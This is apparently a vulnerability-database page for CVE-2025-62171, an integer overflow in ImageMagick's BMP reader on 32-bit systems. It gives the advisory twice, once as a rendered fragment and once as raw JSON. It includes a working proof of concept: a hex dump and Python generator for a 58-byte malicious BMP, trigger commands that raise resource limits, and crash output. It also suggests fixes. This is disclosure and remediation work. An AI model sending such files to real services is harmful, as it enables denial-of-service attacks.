cd /tmp wget https://github.com/ImageMagick/ImageMagick/archive/refs/tags/7.1.2-5.tar.gz tar xzf 7.1.2-5.tar.gz cd ImageMagick-7.1.2-5 ```
Build with AddressSanitizer (32-bit IMPORTANT!)
```bash
Configure for 32-bit build (CRITICAL - must be 32-bit!)
./configure \ --host=i686-pc-linux-gnu \ --disable-dependency-tracking \ --disable-silent-rules \ --disable-shared \ --disable-openmp \ --disable-docs \ --without-x \ --without-perl \ --without-magick-plus-plus \ --without-lqr \ --without-zstd \ --without-tiff \ --with-quantum-depth=8 \ --disable-hdri \ CFLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined" \ CXXFLAGS="-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined" \ LDFLAGS="-fsanitize=address,undefined"
make -j$(nproc)
Trigger the Vulnerability
```bash
Set environment to bypass cache.c limits
export ASAN_OPTIONS="detect_leaks=0:malloc_context_size=20:allocator_may_return_null=1" export MAGICK_WIDTH_LIMIT=2000000000 export MAGICK_HEIGHT_LIMIT=2000000000 export MAGICK_AREA_LIMIT=10000000000
Test with malicious BMP (use Python script above to create it)
./utilities/magick identify overflow.bmp ```
AddressSanitizer Output
==56720==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_poisoning.cc:37
"((AddrIsInMem(addr + size - (1ULL << kDefaultShadowScale)))) != (0)" (0x0, 0x0)
=================================================================
==56720==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_descriptions.cc:80
"((0 && "Address is not in memory and not in shadow?")) != (0)" (0x0, 0x0)
==56720==WARNING: ASan is ignoring requested __asan_handle_no_return:
stack top: 0x40801000; bottom 0x4372f000; size: 0xfd0d2000 (-49471488)
False positive error reports may follow
For details see https://github.com/google/sanitizers/issues/189
It operates in the following environments.
export MAGICK_WIDTH_LIMIT=2000000000
export MAGICK_HEIGHT_LIMIT=2000000000
export MAGICK_AREA_LIMIT=10000000000
Impact
Attack Scenario
- Attacker creates a 58-byte malicious BMP file
- Uploads to web service that uses ImageMagick (on 32-bit system)
- ImageMagick attempts to process the image
- Integer overflow triggers AddressSanitizer crash
- Service becomes unavailable (Denial of Service)
Real-world targets: - Web hosting platforms with image processing - CDN services with thumbnail generation - Legacy embedded systems - IoT devices running 32-bit Linux - Docker containers using 32-bit base images
Recommended Fix
Correct Patch
The overflow check must happen before the multiplication:
```c // Add overflow check BEFORE calculating extent if (BMPOverflowCheck(image->columns, bmp_info.bits_per_pixel) != MagickFalse) ThrowReaderException(CorruptImageError, "IntegerOverflowInDimensions");
// Now safe to calculate extent = image->columns * bmp_info.bits_per_pixel; bytes_per_line = 4*((extent+31)/32);
// Additional safety check if (BMPOverflowCheck(bytes_per_line, image->rows) != MagickFalse) ThrowReaderException(CorruptImageError, "InsufficientImageDataInFile"); ```
Alternative: Use 64-bit Arithmetic
```c // Force 64-bit calculation uint64_t extent_64 = (uint64_t)image->columns * (uint64_t)bmp_info.bits_per_pixel;
if (extent_64 > UINT32_MAX) ThrowReaderException(CorruptImageError, "ImageDimensionsTooLarge");
extent = (size_t)extent_64; bytes_per_line = 4*((extent+31)/32); ```
Credits
wooseokdotkim wooseokdotkim@gmail.com
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.9.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.9.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-HDRI-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.9.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q16-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.9.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-AnyCPU"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.9.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "Magick.NET-Q8-x86"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "14.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62171"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-28T14:43:20Z",
"nvd_published_at": "2025-10-17T17:15:49Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nCVE-2025-57803 claims to be patched in ImageMagick 7.1.2-2, but **the fix is incomplete and ineffective**. The latest version **7.1.2-5 remains vulnerable** to the same integer overflow attack.\n\nThe patch added `BMPOverflowCheck()` but placed it **after** the overflow occurs, making it useless. A malicious 58-byte BMP file can trigger AddressSanitizer crashes and DoS.\n\n**Affected Versions:**\n- ImageMagick \u003c 7.1.2-2 (originally reported)\n- **ImageMagick 7.1.2-2 through 7.1.2-5 (incomplete patch)**\n\n**Platform and Configuration Requirements:**\n- 32-bit systems ONLY (i386, i686, armv7l, etc.)\n- Requires `size_t = 4 bytes`. (64-bit systems are **NOT vulnerable** (size_t = 8 bytes))\n- Requires modified resource limits: The default `width`, `height`, and `area` limits must have been manually increased (Systems using default ImageMagick resource limits are **NOT vulnerable**).\n\n---\n\n## Details(Root Cause Analysis)\n\n### Vulnerable Code Location\n\n**File:** `coders/bmp.c` \n**Lines:** 1120-1122 (in version 7.1.2-5)\n\n### The Incomplete Patch\n\n```c\n// Line 1120: Integer overflow happens HERE\nextent = image-\u003ecolumns * bmp_info.bits_per_pixel; // OVERFLOW!\n\n// Line 1121: Uses already-overflowed value\nbytes_per_line = 4*((extent+31)/32);\n\n// Line 1122: Checks the RESULT, not the multiplication\nif (BMPOverflowCheck(bytes_per_line, image-\u003erows) != MagickFalse)\n ThrowReaderException(CorruptImageError, \"InsufficientImageDataInFile\");\n```\n\n### Why the Patch Fails\n\n**Attack Vector (32-bit system):**\n```\nInput BMP Header:\n Width: 536,870,912 (0x20000000)\n Height: 1\n Bits Per Pixel: 32\n\nCalculation on 32-bit system:\n extent = 536,870,912 \u00d7 32\n = 17,179,869,184 (0x400000000)\n \n 32-bit truncation:\n 0x400000000 \u0026 0xFFFFFFFF = 0x00000000 \u2190 Overflow to ZERO!\n \n bytes_per_line = 4 \u00d7 ((0 + 31) / 32)\n = 4 \u00d7 0\n = 0\n \n BMPOverflowCheck(0, 1):\n return (1 != 0) \u0026\u0026 (0 \u003e 4294967295UL/1)\n return True \u0026\u0026 (0 \u003e 4294967295)\n return True \u0026\u0026 False\n return False \u2190 Does NOT detect overflow!\n```\n\n**The check fails because:**\n1. The overflow happens at Line 1120 (extent calculation)\n2. `extent` becomes 0 due to 32-bit truncation\n3. `bytes_per_line` is calculated as 0 (Line 1121)\n4. `BMPOverflowCheck(0, 1)` returns **False** (no overflow detected)\n5. Code proceeds with corrupted values \u2192 ASan crash\n\n---\n\n## PoC(Proof of Concept)\n\n### Minimal 58-byte BMP File\n\n**Hex dump:**\n```\n00000000 42 4d 3a 00 00 00 00 00 00 00 36 00 00 00 28 00 |BM:.......6...(.|\n00000010 00 00 00 00 00 20 01 00 00 00 01 00 20 00 00 00 |..... ...... ...|\n00000020 00 00 00 00 00 00 13 0b 00 00 13 0b 00 00 00 00 |................|\n00000030 00 00 00 00 00 00 00 00 00 00 |..........|\n```\n\n**Key Fields:**\n- Offset 0x12: Width = `00 00 00 20` = 0x20000000 (536,870,912)\n- Offset 0x16: Height = `01 00 00 00` = 1\n- Offset 0x1C: BPP = `20 00` = 32\n\n### Python Generator\n\n```python\n#!/usr/bin/env python3\nimport struct\n\nwidth = 0x20000000 # 536,870,912\nheight = 1\nbpp = 32\n\n# BMP File Header (14 bytes)\nfile_header = b\u0027BM\u0027\nfile_header += struct.pack(\u0027\u003cI\u0027, 58) # File size\nfile_header += struct.pack(\u0027\u003cHH\u0027, 0, 0) # Reserved\nfile_header += struct.pack(\u0027\u003cI\u0027, 54) # Pixel offset\n\n# DIB Header (40 bytes)\ndib_header = struct.pack(\u0027\u003cI\u0027, 40) # Header size\ndib_header += struct.pack(\u0027\u003ci\u0027, width) # Width\ndib_header += struct.pack(\u0027\u003ci\u0027, height) # Height\ndib_header += struct.pack(\u0027\u003cH\u0027, 1) # Planes\ndib_header += struct.pack(\u0027\u003cH\u0027, bpp) # BPP\ndib_header += struct.pack(\u0027\u003cI\u0027, 0) # Compression\ndib_header += struct.pack(\u0027\u003cI\u0027, 0) # Image size\ndib_header += struct.pack(\u0027\u003ci\u0027, 2835) # X ppm\ndib_header += struct.pack(\u0027\u003ci\u0027, 2835) # Y ppm\ndib_header += struct.pack(\u0027\u003cI\u0027, 0) # Colors\ndib_header += struct.pack(\u0027\u003cI\u0027, 0) # Important colors\n\npixel_data = b\u0027\\x00\\x00\\x00\\x00\u0027\n\nwith open(\u0027overflow.bmp\u0027, \u0027wb\u0027) as f:\n f.write(file_header + dib_header + pixel_data)\n\nprint(f\"Created overflow.bmp (58 bytes)\")\n```\n\n---\n\n## Reproduction Steps\n\n### Environment Setup\n\n```bash\n# Use 32-bit Docker container\ndocker run -it --name test-32bit i386/ubuntu:latest bash\n\n# Install dependencies\napt-get update\napt-get install -y clang build-essential wget tar \\\n libpng-dev libjpeg-dev libfreetype6-dev libxml2-dev \\\n zlib1g-dev liblzma-dev libbz2-dev\n\n# Download ImageMagick 7.1.2-5\ncd /tmp\nwget https://github.com/ImageMagick/ImageMagick/archive/refs/tags/7.1.2-5.tar.gz\ntar xzf 7.1.2-5.tar.gz\ncd ImageMagick-7.1.2-5\n```\n\n### Build with AddressSanitizer (32-bit IMPORTANT!)\n\n```bash\n# Configure for 32-bit build (CRITICAL - must be 32-bit!)\n./configure \\\n --host=i686-pc-linux-gnu \\\n --disable-dependency-tracking \\\n --disable-silent-rules \\\n --disable-shared \\\n --disable-openmp \\\n --disable-docs \\\n --without-x \\\n --without-perl \\\n --without-magick-plus-plus \\\n --without-lqr \\\n --without-zstd \\\n --without-tiff \\\n --with-quantum-depth=8 \\\n --disable-hdri \\\n CFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n CXXFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n LDFLAGS=\"-fsanitize=address,undefined\"\n\nmake -j$(nproc)\n\n### Trigger the Vulnerability\n\n```bash\n# Set environment to bypass cache.c limits\nexport ASAN_OPTIONS=\"detect_leaks=0:malloc_context_size=20:allocator_may_return_null=1\"\nexport MAGICK_WIDTH_LIMIT=2000000000\nexport MAGICK_HEIGHT_LIMIT=2000000000\nexport MAGICK_AREA_LIMIT=10000000000\n\n# Test with malicious BMP (use Python script above to create it)\n./utilities/magick identify overflow.bmp\n```\n\n---\n\n## AddressSanitizer Output\n\n```\n==56720==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_poisoning.cc:37 \n\"((AddrIsInMem(addr + size - (1ULL \u003c\u003c kDefaultShadowScale)))) != (0)\" (0x0, 0x0)\n=================================================================\n==56720==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/asan/asan_descriptions.cc:80 \n\"((0 \u0026\u0026 \"Address is not in memory and not in shadow?\")) != (0)\" (0x0, 0x0)\n==56720==WARNING: ASan is ignoring requested __asan_handle_no_return: \nstack top: 0x40801000; bottom 0x4372f000; size: 0xfd0d2000 (-49471488)\nFalse positive error reports may follow\nFor details see https://github.com/google/sanitizers/issues/189\n```\n\nIt operates in the following environments.\n\n```\nexport MAGICK_WIDTH_LIMIT=2000000000\nexport MAGICK_HEIGHT_LIMIT=2000000000\nexport MAGICK_AREA_LIMIT=10000000000\n```\n\n## Impact\n\n### Attack Scenario\n\n1. Attacker creates a 58-byte malicious BMP file\n2. Uploads to web service that uses ImageMagick (on 32-bit system)\n3. ImageMagick attempts to process the image\n4. Integer overflow triggers AddressSanitizer crash\n5. Service becomes unavailable (Denial of Service)\n\n**Real-world targets:**\n- Web hosting platforms with image processing\n- CDN services with thumbnail generation\n- Legacy embedded systems\n- IoT devices running 32-bit Linux\n- Docker containers using 32-bit base images\n\n---\n\n## Recommended Fix\n\n### Correct Patch\n\nThe overflow check must happen **before** the multiplication:\n\n```c\n// Add overflow check BEFORE calculating extent\nif (BMPOverflowCheck(image-\u003ecolumns, bmp_info.bits_per_pixel) != MagickFalse)\n ThrowReaderException(CorruptImageError, \"IntegerOverflowInDimensions\");\n\n// Now safe to calculate\nextent = image-\u003ecolumns * bmp_info.bits_per_pixel;\nbytes_per_line = 4*((extent+31)/32);\n\n// Additional safety check\nif (BMPOverflowCheck(bytes_per_line, image-\u003erows) != MagickFalse)\n ThrowReaderException(CorruptImageError, \"InsufficientImageDataInFile\");\n```\n\n### Alternative: Use 64-bit Arithmetic\n\n```c\n// Force 64-bit calculation\nuint64_t extent_64 = (uint64_t)image-\u003ecolumns * (uint64_t)bmp_info.bits_per_pixel;\n\nif (extent_64 \u003e UINT32_MAX)\n ThrowReaderException(CorruptImageError, \"ImageDimensionsTooLarge\");\n\nextent = (size_t)extent_64;\nbytes_per_line = 4*((extent+31)/32);\n```\n\n### Credits\nwooseokdotkim\nwooseokdotkim@gmail.com",
"id": "GHSA-9pp9-cfwx-54rm",
"modified": "2025-10-28T14:43:21Z",
"published": "2025-10-28T14:43:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62171"
},
{
"type": "WEB",
"url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00"
},
{
"type": "PACKAGE",
"url": "https://github.com/ImageMagick/ImageMagick"
},
{
"type": "WEB",
"url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.9.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "ImageMagick has Integer Overflow in BMP Decoder (ReadBMP)"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…